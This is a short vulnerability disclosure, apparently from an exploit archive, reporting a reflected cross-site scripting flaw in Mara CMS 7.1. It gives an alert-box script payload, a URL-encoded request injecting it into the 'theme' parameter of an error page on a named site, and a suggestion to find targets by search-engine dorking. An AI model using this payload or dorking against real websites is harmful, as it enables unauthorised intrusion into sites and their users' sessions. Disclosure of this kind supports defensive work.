Mara CMS 7.1 Cross Site Scripting

Mara CMS version 7.1 suffers from a cross site scripting vulnerability.


MD5 | 3e93531d1e20d676c80af3a479bd1164

============================================================================================================================
| # Title : Mara CMS 7.1 xss Vulnerability |
| # Author : indoushka |
| # Telegram : @indoushka |
| # Tested on : windows 10 FranASSais V.(Pro) | |
| # Vendor : https://iwrconsultancy.co.uk/codebase/download.php |
| # Dork : n/a |
============================================================================================================================

poc :

[+] Dorking Adegn Google Or Other Search Enggine

[+] Use Payload : <script>alert(/indoushka/);</script>

http://maracms.com/.error.php?theme=slate%27%22()%26%25%3Cacx%3E%3Cscript%3Ealert(/indoushka/);%3C/script%3E

Greetz :----------------------------------------------------------------------------------------
|
jericho * Larry W. Cashdollar * shadow0075 * djroot.dz *Gjoko 'LiquidWorm' Krstic |
|
================================================================================================

Related Posts

Comments